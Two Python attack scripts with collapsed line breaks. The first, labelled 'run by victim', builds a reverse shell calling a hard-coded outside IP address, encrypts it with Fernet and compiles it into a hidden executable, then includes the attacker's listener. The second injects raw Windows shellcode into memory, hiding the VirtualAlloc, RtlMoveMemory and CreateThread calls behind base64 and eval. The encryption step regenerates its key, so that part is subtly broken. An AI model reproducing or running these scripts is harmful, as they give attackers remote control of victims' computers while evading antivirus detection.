#coding:utf-8#run by victimfrom cryptography.fernet import Fernetimport ospayload=b'''import socket, subprocessremote_ip='8.129.211.1'remote_port=12345s=socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)s.connect((remote_ip,remote_port))while True:    data=s.recv(2048)    if data=='quit' or data=='exit' or data=='': break    result=subprocess.Popen(data, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)    s.send(result.stdout.read()+result.stderr.read())s.close()'''print('Now, Encrypting......')fernet1=Fernet(Fernet.generate_key())encoded_payload=fernet1.encrypt(bytes(payload))file1=open('shellcode.py','w+')file1.write('from cryptography.fernet import Fernet'+'\n'+            'fernet1=Fernet(Fernet.generate_key())'+'\n'+            'encoded_payload='+encoded_payload+'\n'+            'exec(fernet1.decrypt(encoded_payload))')file1.close()print('Encryption Complete.')print('Now, Compiling......')os.system('pyinstaller -F shellcode.py --noconsole')print('Compile Complete.')#run by hacker'''import sockets=socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)local_ip=''local_port=12345s.bind((local_ip, local_port))s.listen(20)print('Listening...')(conn, addr)=s.accept()print('Connected by', addr)while True:    cmd=raw_input('Shell:')    conn.send(cmd)    if cmd=='quit' or cmd=='exit' or cmd=='': break    data=conn.recv(2048)    print dataconn.close()'''

#coding:utf-8#run by victimimport ctypes, base64payload =  b""payload += b"\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b"payload += b"\x52\x30\x8b\x52\x0c\x8b\x52\x14\x0f\xb7\x4a\x26\x8b"payload += b"\x72\x28\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20"payload += b"\xc1\xcf\x0d\x01\xc7\x49\x75\xef\x52\x8b\x52\x10\x8b"payload += b"\x42\x3c\x01\xd0\x57\x8b\x40\x78\x85\xc0\x74\x4c\x01"payload += b"\xd0\x8b\x58\x20\x8b\x48\x18\x50\x01\xd3\x85\xc9\x74"payload += b"\x3c\x31\xff\x49\x8b\x34\x8b\x01\xd6\x31\xc0\xc1\xcf"payload += b"\x0d\xac\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d"payload += b"\x24\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b"payload += b"\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"payload += b"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b"payload += b"\x12\xe9\x80\xff\xff\xff\x5d\x68\x33\x32\x00\x00\x68"payload += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8\xff"payload += b"\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80"payload += b"\x6b\x00\xff\xd5\x6a\x0a\x68\x08\x81\xd3\x01\x68\x02"payload += b"\x00\x30\x39\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"payload += b"\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68"payload += b"\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08"payload += b"\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a\x04\x56\x57"payload += b"\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b"payload += b"\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58"payload += b"\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68"payload += b"\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68"payload += b"\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff"payload += b"\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c"payload += b"\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01"payload += b"\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00"payload += b"\x53\xff\xd5" payload=bytearray(payload)ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_intbuf=(ctypes.c_char*len(payload)).from_buffer(payload)# ptr=ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(payload)), ctypes.c_int(0x3000), ctypes.c_int(0x40))eval(base64.b64decode('cHRyPWN0eXBlcy53aW5kbGwua2VybmVsMzIuVmlydHVhbEFsbG9jKGN0eXBlcy5jX2ludCgwKSwgY3R5cGVzLmNfaW50KGxlbihwYXlsb2FkKSksIGN0eXBlcy5jX2ludCgweDMwMDApLCBjdHlwZXMuY19pbnQoMHg0MCkp'))# ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(payload)))eval(base64.b64decode('Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX2ludChwdHIpLCBidWYsIGN0eXBlcy5jX2ludChsZW4ocGF5bG9hZCkpKQ=='))# handler=ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))eval(base64.b64decode('aGFuZGxlcj1jdHlwZXMud2luZGxsLmtlcm5lbDMyLkNyZWF0ZVRocmVhZChjdHlwZXMuY19pbnQoMCksIGN0eXBlcy5jX2ludCgwKSwgY3R5cGVzLmNfaW50KHB0ciksIGN0eXBlcy5jX2ludCgwKSwgY3R5cGVzLmNfaW50KDApLCBjdHlwZXMucG9pbnRlcihjdHlwZXMuY19pbnQoMCkpKQ=='))# ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handler), ctypes.c_int(-1))eval(base64.b64decode('Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGN0eXBlcy5jX2ludChoYW5kbGVyKSwgY3R5cGVzLmNfaW50KC0xKSk='))